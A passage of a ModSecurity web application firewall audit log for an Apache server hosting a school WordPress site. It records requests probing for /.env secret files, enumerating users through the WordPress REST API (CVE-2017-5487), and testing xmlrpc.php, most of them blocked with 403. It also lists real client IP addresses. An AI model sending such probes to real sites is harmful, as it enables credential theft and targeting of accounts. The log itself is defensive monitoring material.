Action: Intercepted (phase 2)
Stopwatch: 1745612803906744 3819 (- - -)
Stopwatch2: 1745612803906744 3819; combined=2127, p1=660, p2=1430, p3=0, p4=0, p5=37, sr=82, sw=0, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--da999f54-Z--
--0d097458-A--
[26/Apr/2025:03:43:14 +0700] aAvz4tDEbIDiBZnoTx75PQAAAFE 103.236.140.4 54266 103.236.140.4 8181
--0d097458-B--
GET /.env HTTP/1.0
Host: 103.236.140.4
X-Real-IP: 35.216.163.43
X-Forwarded-Host: 103.236.140.4
X-Forwarded-Server: 103.236.140.4
X-Forwarded-For: 35.216.163.43
X-Forwarded-Proto: http
Connection: close
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:103.0) Gecko/20100101 Firefox/103.0 abuse.xmco.fr
--0d097458-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--0d097458-H--
Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 1)
Stopwatch: 1745613794089180 842 (- - -)
Stopwatch2: 1745613794089180 842; combined=365, p1=328, p2=0, p3=0, p4=0, p5=37, sr=87, sw=0, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--0d097458-Z--
--47df3521-A--
[26/Apr/2025:03:55:12 +0700] aAv2sNQ6lpQjDvc0F_Nb9gAAAMc 103.236.140.4 57052 103.236.140.4 8181
--47df3521-B--
GET /wp-json/wp/v2/users/ HTTP/1.0
Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/
Host: smkn22-jkt.sch.id
X-Real-IP: 116.118.104.42
X-Forwarded-Host: smkn22-jkt.sch.id
X-Forwarded-Server: smkn22-jkt.sch.id
X-Forwarded-For: 116.118.104.42
X-Forwarded-Proto: https
Connection: close
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36
--47df3521-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--47df3521-H--
Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 2)
Stopwatch: 1745614512701591 3093 (- - -)
Stopwatch2: 1745614512701591 3093; combined=1351, p1=458, p2=863, p3=0, p4=0, p5=30, sr=88, sw=0, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--47df3521-Z--
--aa530f54-A--
[26/Apr/2025:04:21:55 +0700] aAv883GCMLWH05JCdxzX7gAAAIc 103.236.140.4 35076 103.236.140.4 8181
--aa530f54-B--
GET /.env HTTP/1.0
Host: 103.236.140.4
X-Real-IP: 107.170.12.138
X-Forwarded-Host: 103.236.140.4
X-Forwarded-Server: 103.236.140.4
X-Forwarded-For: 107.170.12.138
X-Forwarded-Proto: http
Connection: close
User-Agent: Mozilla/5.0; Keydrop.io/1.0(onlyscans.com/about);
Accept: */*
--aa530f54-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--aa530f54-H--
Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 1)
Stopwatch: 1745616115196046 866 (- - -)
Stopwatch2: 1745616115196046 866; combined=382, p1=344, p2=0, p3=0, p4=0, p5=38, sr=132, sw=0, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--aa530f54-Z--
--d928af76-A--
[26/Apr/2025:05:30:15 +0700] aAwM99DEbIDiBZnoTx7_DwAAAEg 103.236.140.4 51152 103.236.140.4 8181
--d928af76-B--
GET /wp-json/wp/v2/users/ HTTP/1.0
Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/
Host: smkn22-jkt.sch.id
X-Real-IP: 181.191.230.232
X-Forwarded-Host: smkn22-jkt.sch.id
X-Forwarded-Server: smkn22-jkt.sch.id
X-Forwarded-For: 181.191.230.232
X-Forwarded-Proto: https
Connection: close
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36
--d928af76-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--d928af76-H--
Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 2)
Stopwatch: 1745620215261527 3055 (- - -)
Stopwatch2: 1745620215261527 3055; combined=1537, p1=502, p2=945, p3=0, p4=0, p5=89, sr=130, sw=1, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--d928af76-Z--
--4b0dce70-A--
[26/Apr/2025:05:31:20 +0700] aAwNONQ6lpQjDvc0F_Nh6AAAAM4 103.236.140.4 51410 103.236.140.4 8181
--4b0dce70-B--
GET /wp-json/wp/v2/users/ HTTP/1.0
Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/
Host: smkn22-jkt.sch.id
X-Real-IP: 142.202.241.115
X-Forwarded-Host: smkn22-jkt.sch.id
X-Forwarded-Server: smkn22-jkt.sch.id
X-Forwarded-For: 142.202.241.115
X-Forwarded-Proto: https
Connection: close
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36
--4b0dce70-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--4b0dce70-H--
Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 2)
Stopwatch: 1745620280186763 2763 (- - -)
Stopwatch2: 1745620280186763 2763; combined=1176, p1=419, p2=717, p3=0, p4=0, p5=40, sr=80, sw=0, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--4b0dce70-Z--
--5af58f10-A--
[26/Apr/2025:05:31:34 +0700] aAwNRnGCMLWH05JCdxzbrwAAAIw 103.236.140.4 51456 103.236.140.4 8181
--5af58f10-B--
GET /wp-json/wp/v2/users/ HTTP/1.0
Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/
Host: smkn22-jkt.sch.id
X-Real-IP: 205.196.221.238
X-Forwarded-Host: smkn22-jkt.sch.id
X-Forwarded-Server: smkn22-jkt.sch.id
X-Forwarded-For: 205.196.221.238
X-Forwarded-Proto: https
Connection: close
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36
--5af58f10-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--5af58f10-H--
Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 2)
Stopwatch: 1745620294622769 2689 (- - -)
Stopwatch2: 1745620294622769 2689; combined=1344, p1=412, p2=902, p3=0, p4=0, p5=29, sr=75, sw=1, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--5af58f10-Z--
--50b0fd7f-A--
[26/Apr/2025:05:36:54 +0700] aAwOhtQ6lpQjDvc0F_NiOAAAANc 103.236.140.4 52692 103.236.140.4 8181
--50b0fd7f-B--
GET /.env HTTP/1.0
Host: 103.236.140.4
X-Real-IP: 196.251.80.2
X-Forwarded-Host: 103.236.140.4
X-Forwarded-Server: 103.236.140.4
X-Forwarded-For: 196.251.80.2
X-Forwarded-Proto: https
Connection: close
User-Agent: Mozilla/5.0 (X11; Linux i686; rv:6.0) Gecko/20100101 Firefox/6.0
Accept-Charset: utf-8
--50b0fd7f-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--50b0fd7f-H--
Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 1)
Stopwatch: 1745620614965350 837 (- - -)
Stopwatch2: 1745620614965350 837; combined=376, p1=336, p2=0, p3=0, p4=0, p5=39, sr=125, sw=1, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--50b0fd7f-Z--
--50abc372-A--
[26/Apr/2025:05:56:33 +0700] aAwTIdDEbIDiBZnoTx4AgAAAAFg 103.236.140.4 57224 103.236.140.4 8181
--50abc372-B--
GET /.env HTTP/1.0
Host: 103.236.140.4
X-Real-IP: 196.251.92.38
X-Forwarded-Host: 103.236.140.4
X-Forwarded-Server: 103.236.140.4
X-Forwarded-For: 196.251.92.38
X-Forwarded-Proto: http
Connection: close
User-agent: Mozilla/5.0 (Linux; U; Android 4.4.2; en-US; HM NOTE 1W Build/KOT49H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 UCBrowser/11.0.5.850 U3/0.8.0 Mobile Safari/534.30
Accept: */*
--50abc372-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--50abc372-H--
Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 1)
Stopwatch: 1745621793011232 659 (- - -)
Stopwatch2: 1745621793011232 659; combined=268, p1=237, p2=0, p3=0, p4=0, p5=31, sr=62, sw=0, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--50abc372-Z--
--ddeaf071-A--
[26/Apr/2025:05:56:38 +0700] aAwTJtDEbIDiBZnoTx4AhAAAAEY 103.236.140.4 57244 103.236.140.4 8181
--ddeaf071-B--
GET /.env HTTP/1.0
Host: 103.236.140.4
X-Real-IP: 196.251.92.38
X-Forwarded-Host: 103.236.140.4
X-Forwarded-Server: 103.236.140.4
X-Forwarded-For: 196.251.92.38
X-Forwarded-Proto: https
Connection: close
User-agent: Mozilla/5.0 (Linux; U; Android 4.4.2; en-US; HM NOTE 1W Build/KOT49H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 UCBrowser/11.0.5.850 U3/0.8.0 Mobile Safari/534.30
Accept: */*
--ddeaf071-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--ddeaf071-H--
Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 1)
Stopwatch: 1745621798159570 824 (- - -)
Stopwatch2: 1745621798159570 824; combined=368, p1=329, p2=0, p3=0, p4=0, p5=39, sr=115, sw=0, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--ddeaf071-Z--
--0fce2e11-A--
[26/Apr/2025:06:15:21 +0700] aAwXidQ6lpQjDvc0F_NkCAAAANQ 103.236.140.4 33304 103.236.140.4 8181
--0fce2e11-B--
GET /.env HTTP/1.0
Host: 103.236.140.4
X-Real-IP: 195.211.191.76
X-Forwarded-Host: 103.236.140.4
X-Forwarded-Server: 103.236.140.4
X-Forwarded-For: 195.211.191.76
X-Forwarded-Proto: https
Connection: close
User-Agent: Mozilla/5.0 (Linux; Android 8.0.0; SM-G950U1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.111 Mobile Safari/537.36
Accept-Charset: utf-8
--0fce2e11-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--0fce2e11-H--
Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 1)
Stopwatch: 1745622921462064 814 (- - -)
Stopwatch2: 1745622921462064 814; combined=385, p1=346, p2=0, p3=0, p4=0, p5=39, sr=137, sw=0, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--0fce2e11-Z--
--0f8e4803-A--
[26/Apr/2025:06:56:12 +0700] aAwhHNQ6lpQjDvc0F_NnCAAAANY 103.236.140.4 42720 103.236.140.4 8181
--0f8e4803-B--
GET /wp-json/wp/v2/users/ HTTP/1.0
Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/
Host: smkn22-jkt.sch.id
X-Real-IP: 139.255.223.213
X-Forwarded-Host: smkn22-jkt.sch.id
X-Forwarded-Server: smkn22-jkt.sch.id
X-Forwarded-For: 139.255.223.213
X-Forwarded-Proto: https
Connection: close
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36
--0f8e4803-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--0f8e4803-H--
Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 2)
Stopwatch: 1745625372790830 2682 (- - -)
Stopwatch2: 1745625372790830 2682; combined=1363, p1=446, p2=888, p3=0, p4=0, p5=29, sr=78, sw=0, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--0f8e4803-Z--
--f160c44a-A--
[26/Apr/2025:07:09:52 +0700] aAwkUNDEbIDiBZnoTx4EkwAAAEg 103.236.140.4 45900 103.236.140.4 8181
--f160c44a-B--
GET /wp-json/wp/v2/users HTTP/1.0
Referer: https://www.google.com
Host: smkn22-jkt.sch.id
X-Real-IP: 154.213.161.108
X-Forwarded-Host: smkn22-jkt.sch.id
X-Forwarded-Server: smkn22-jkt.sch.id
X-Forwarded-For: 154.213.161.108
X-Forwarded-Proto: https
Connection: close
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
--f160c44a-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--f160c44a-H--
Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 2)
Stopwatch: 1745626192782819 2326 (- - -)
Stopwatch2: 1745626192782819 2326; combined=1322, p1=439, p2=853, p3=0, p4=0, p5=30, sr=76, sw=0, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--f160c44a-Z--
--18d46348-A--
[26/Apr/2025:07:09:55 +0700] aAwkU9DEbIDiBZnoTx4ElQAAAEk 103.236.140.4 45912 103.236.140.4 8181
--18d46348-B--
POST /xmlrpc.php HTTP/1.0
Host: smkn22-jkt.sch.id
X-Real-IP: 154.213.161.108
X-Forwarded-Host: smkn22-jkt.sch.id
X-Forwarded-Server: smkn22-jkt.sch.id
X-Forwarded-For: 154.213.161.108
X-Forwarded-Proto: https
Connection: close
Content-Length: 136
Content-Type: text/plain; charset=ISO-8859-1
User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26)
--18d46348-C--
demo.sayHello
--18d46348-F--
HTTP/1.1 301 Moved Permanently
Location: https://www.smkn22jakarta.sch.id/xmlrpc.php
Content-Length: 251
Connection: close
Content-Type: text/html; charset=iso-8859-1
--18d46348-H--
Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost
Stopwatch: 1745626195520487 6875 (- - -)
Stopwatch2: 1745626195520487 6875; combined=4912, p1=617, p2=4028, p3=38, p4=43, p5=108, sr=118, sw=78, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--18d46348-Z--
--3bd9a53f-A--
[26/Apr/2025:07:12:58 +0700] aAwlCtDEbIDiBZnoTx4EvQAAAEs 103.236.140.4 46604 103.236.140.4 8181
--3bd9a53f-B--
GET /wp-json/wp/v2/users HTTP/1.0
Referer: https://www.google.com
Host: smkn22-jkt.sch.id
X-Real-IP: 156.228.94.237
X-Forwarded-Host: smkn22-jkt.sch.id
X-Forwarded-Server: smkn22-jkt.sch.id
X-Forwarded-For: 156.228.94.237
X-Forwarded-Proto: https
Connection: close
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
--3bd9a53f-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--3bd9a53f-H--
Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 2)
Stopwatch: 1745626378125849 2784 (- - -)
Stopwatch2: 1745626378125849 2784; combined=1437, p1=466, p2=939, p3=0, p4=0, p5=32, sr=73, sw=0, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--3bd9a53f-Z--
--2b96a847-A--
[26/Apr/2025:07:13:00 +0700] aAwlDNQ6lpQjDvc0F_NocgAAANA 103.236.140.4 46620 103.236.140.4 8181
--2b96a847-B--
POST /xmlrpc.php HTTP/1.0
Host: smkn22-jkt.sch.id
X-Real-IP: 156.228.94.237
X-Forwarded-Host: smkn22-jkt.sch.id
X-Forwarded-Server: smkn22-jkt.sch.id
X-Forwarded-For: 156.228.94.237
X-Forwarded-Proto: https
Connection: close
Content-Length: 136
Content-Type: text/plain; charset=ISO-8859-1
User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26)
--2b96a847-C--
demo.sayHello
--2b96a847-F--
HTTP/1.1 301 Moved Permanently
Location: https://www.smkn22jakarta.sch.id/xmlrpc.php
Content-Length: 251
Connection: close
Content-Type: text/html; charset=iso-8859-1
--2b96a847-H--
Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost
Stopwatch: 1745626380878999 6299 (- - -)
Stopwatch2: 1745626380878999 6299; combined=4600, p1=591, p2=3767, p3=31, p4=35, p5=103, sr=93, sw=73, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--2b96a847-Z--
--72844424-A--
[26/Apr/2025:07:15:47 +0700] aAwls03IXD9XJ6lrmIWepAAAAA4 103.236.140.4 47274 103.236.140.4 8181
--72844424-B--
GET /wp-json/wp/v2/users HTTP/1.0
Referer: https://www.google.com
Host: smkn22-jkt.sch.id
X-Real-IP: 156.242.40.15
X-Forwarded-Host: smkn22-jkt.sch.id
X-Forwarded-Server: smkn22-jkt.sch.id
X-Forwarded-For: 156.242.40.15
X-Forwarded-Proto: https
Connection: close
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
--72844424-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--72844424-H--
Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 2)
Stopwatch: 1745626547193448 3116 (- - -)
Stopwatch2: 1745626547193448 3116; combined=1355, p1=480, p2=823, p3=0, p4=0, p5=52, sr=122, sw=0, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--72844424-Z--
--33a3267c-A--
[26/Apr/2025:07:15:50 +0700] aAwlttDEbIDiBZnoTx4E4QAAAEY 103.236.140.4 47290 103.236.140.4 8181
--33a3267c-B--
POST /xmlrpc.php HTTP/1.0
Host: smkn22-jkt.sch.id
X-Real-IP: 156.242.40.15
X-Forwarded-Host: smkn22-jkt.sch.id
X-Forwarded-Server: smkn22-jkt.sch.id
X-Forwarded-For: 156.242.40.15
X-Forwarded-Proto: https
Connection: close
Content-Length: 136
Content-Type: text/plain; charset=ISO-8859-1
User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26)
--33a3267c-C--
demo.sayHello
--33a3267c-F--
HTTP/1.1 301 Moved Permanently
Location: https://www.smkn22jakarta.sch.id/xmlrpc.php
Content-Length: 251
Connection: close
Content-Type: text/html; charset=iso-8859-1
--33a3267c-H--
Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost
Stopwatch: 1745626550952653 6644 (- - -)
Stopwatch2: 1745626550952653 6644; combined=4740, p1=578, p2=3906, p3=37, p4=44, p5=103, sr=74, sw=72, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--33a3267c-Z--
--6f958d4e-A--
[26/Apr/2025:07:21:01 +0700] aAwm7dDEbIDiBZnoTx4FEgAAAEQ 103.236.140.4 48462 103.236.140.4 8181
--6f958d4e-B--
GET /wp-json/wp/v2/users HTTP/1.0
Referer: https://www.google.com
Host: smkn22-jkt.sch.id
